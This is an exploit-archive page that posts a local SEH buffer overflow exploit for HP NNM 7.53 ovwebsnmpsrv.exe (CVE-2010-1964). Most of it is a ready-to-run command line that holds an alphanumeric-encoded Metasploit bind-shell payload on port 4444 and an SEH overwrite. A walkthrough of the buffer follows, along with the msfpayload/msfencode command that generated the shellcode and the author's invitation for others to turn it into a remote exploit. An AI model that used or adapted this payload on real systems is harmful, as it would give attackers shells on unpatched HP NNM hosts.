HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow: Posted Jul 7, 2010; Authored by bitform; HP NNM version 7.53 suffers from a buffer overflow vulnerability in ovwebsnmpsrv.exe.; tags | exploit, overflow; advisories | CVE-2010-1964; SHA-256 | 6eeaab66bff0c4a05ace7074273ab99bbee5174fa6079fd37637c4ceb165dd30; Download | Favorite | View

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow

# Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Date: 07/06/2010
# Author: bitform
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows XP SP2
# CVE: CVE-2010-1964
 
# Exploit:
 
C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
 
# Notes:
 
This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
a practical remote exploit. :D
 
Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo)
 
Explanation of buffer:
 
"UXf-9Tf-9Tf-9TU"
Carve out EAX as the base register for the alphanumeric shellcode
 
"PYIIIIIIIIIIIIIIII7QZ"...
Alphanumeric bind shell
# ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw
 
   \/ Overwrite SEH 
  [  ]
"YY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"
      [                                           ]
                         /\ Carve out non-conditional jmp to carve EAX code

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow

Share This

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems